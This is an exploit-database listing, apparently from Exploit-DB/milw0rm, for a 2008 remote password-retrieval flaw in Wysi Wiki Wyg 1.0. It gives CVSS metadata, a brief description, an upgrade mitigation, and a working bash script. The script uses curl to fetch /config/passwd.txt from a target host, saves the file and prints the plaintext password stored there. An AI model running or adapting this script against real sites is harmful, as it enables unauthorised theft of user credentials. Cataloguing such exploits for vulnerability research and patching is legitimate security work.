header-logo
Suggest Exploit
vendor:
Wysi Wiki Wyg 1.0
by:
athos
7.5
CVSS
HIGH
Remote Password Retrieve
200
CWE
Product Name: Wysi Wiki Wyg 1.0
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:wysiwyg:wysi_wiki_wyg
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit

This exploit allows an attacker to retrieve the password of a Wysi Wiki Wyg 1.0 user by sending a malicious request to the server. The malicious request is sent to the /config/passwd.txt path, which contains the user's password in plaintext.

Mitigation:

Upgrade to the latest version of Wysi Wiki Wyg 1.0
Source

Exploit-DB raw data:

#!/bin/bash
# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# by athos - staker[at]hotmail[dot]it

host=$1;
name=$2;
path='/config/passwd.txt';

if [ "$name" = "" ]; then
        echo "Usage: bash $0 [host/path] [filename]";
        echo "by athos - staker[at]hotmail[dot]it";
        exit;
fi;      

curl $host/$path > $name;
clear
cat $name;

# milw0rm.com [2008-12-12]